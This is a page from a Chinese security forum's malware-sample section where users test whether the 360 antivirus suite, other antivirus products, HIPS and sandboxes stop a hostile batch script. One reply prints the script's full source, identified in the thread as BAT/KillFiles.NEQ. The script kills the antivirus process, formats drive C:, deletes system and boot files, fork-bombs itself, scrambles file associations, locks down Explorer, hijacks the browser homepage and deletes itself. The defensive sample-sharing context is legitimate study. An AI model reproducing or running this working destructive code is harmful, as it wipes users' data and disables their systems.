收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 看看360什么时候可以完全防御
123456下一页
返回列表 发新帖
楼主: 郑伟用户
 收起左侧

[病毒样本] 看看360什么时候可以完全防御

  [复制链接]
a256886572008
发表于 2011-11-1 15:18:32 | 显示全部楼层
郑伟用户 发表于 2011-11-1 15:15
恩,我不会拿着金山可以防御的东西来说360不能防御的,这个金山也防御不了

很多號稱智能的 主防 也防不住,因為 cmd.exe 是信任進程。
回复

举报

郑伟用户
 楼主| 发表于 2011-11-1 15:22:19 | 显示全部楼层
FOXFFF 发表于 2011-11-1 15:16
看来必须想办法解决才是,貌似入沙只能防止被破坏但是不能防止被弹窗卡死电脑.....

恩,也许大家在卡饭习惯了,认为使用电脑的就都懂电脑,其实在我们现实生活中,特别是农村地区,人们的文化水平并不是都很高,比如我就纯小白一个。像遇到这类就是悲剧,这不你看360拦截后重启计算机的截图【和昨天还不一样,同样的东西昨天没这么悲剧,360主防抽风也厉害啊】

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

FOXFFF
发表于 2011-11-1 15:24:31 | 显示全部楼层
郑伟用户 发表于 2011-11-1 15:22
恩,也许大家在卡饭习惯了,认为使用电脑的就都懂电脑,其实在我们现实生活中,特别是农村地区,人们的文 ...

虚拟机....PS:貌似虚拟机有时候不能反映真实的场景吧.....幸好俺用沙箱测试的,不然把公司电脑弄挂了都不能工作了...
回复

举报

郑伟用户
 楼主| 发表于 2011-11-1 15:25:22 | 显示全部楼层
a256886572008 发表于 2011-11-1 15:18
很多號稱智能的 主防 也防不住,因為 cmd.exe 是信任進程。

恩,这个也确实,但是做安全的,必须要与之对抗,虽然CMD是信任的,可是因该要看是谁在利用它,而他运行以后是在干什么。
回复

举报

a256886572008
发表于 2011-11-1 15:40:10 | 显示全部楼层
郑伟用户 发表于 2011-11-1 15:25
恩,这个也确实,但是做安全的,必须要与之对抗,虽然CMD是信任的,可是因该要看是谁在利用它,而他运行以 ...

就是因為這樣,新一代的 HIPS 加入了 命令行檢測功能,就不怕被騙了

回复

举报

zckey
发表于 2011-11-1 17:16:22 | 显示全部楼层
a256886572008 发表于 2011-11-1 15:40
就是因為這樣,新一代的 HIPS 加入了 命令行檢測功能,就不怕被騙了

那个新一代的 HIPS 是什么?现在的CIS 5.8 能用么?
回复

举报

myzuzong
发表于 2011-11-1 17:23:10 | 显示全部楼层
a256886572008 发表于 2011-11-1 15:18
很多號稱智能的 主防 也防不住,因為 cmd.exe 是信任進程。

很遗憾,不是这样的.
回复

举报

iezhaoie
头像被屏蔽
发表于 2011-11-1 17:26:54 | 显示全部楼层
微点扫描miss
回复

举报

dalianjhc1986
发表于 2011-11-1 17:58:20 | 显示全部楼层

360.bat - BAT/KillFiles.NEQ trojan

Regards,

Miroslav Legen
Malware Researcher
ESET spol. s.r.o
回复

举报

yusup
发表于 2011-11-1 18:41:57 | 显示全部楼层
第一次在沙盘里黑框弹不停,不知所措,关机了,然后开TF的那个影子,再把它扔沙盘里,没想到这货不弹了,怪了,如下:
@echo off
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
taskkill /im 360tray.exe /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
echo y^|format C: /q
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://hao.360.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://hao.360.cn /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
taskkill /im 360tray.exe /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
echo y^|format C: /q
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://hao.360.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://hao.360.cn /f
del %0 /f
回复

举报

下一页 »
123456下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-8-22 07:02 , Processed in 0.087183 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表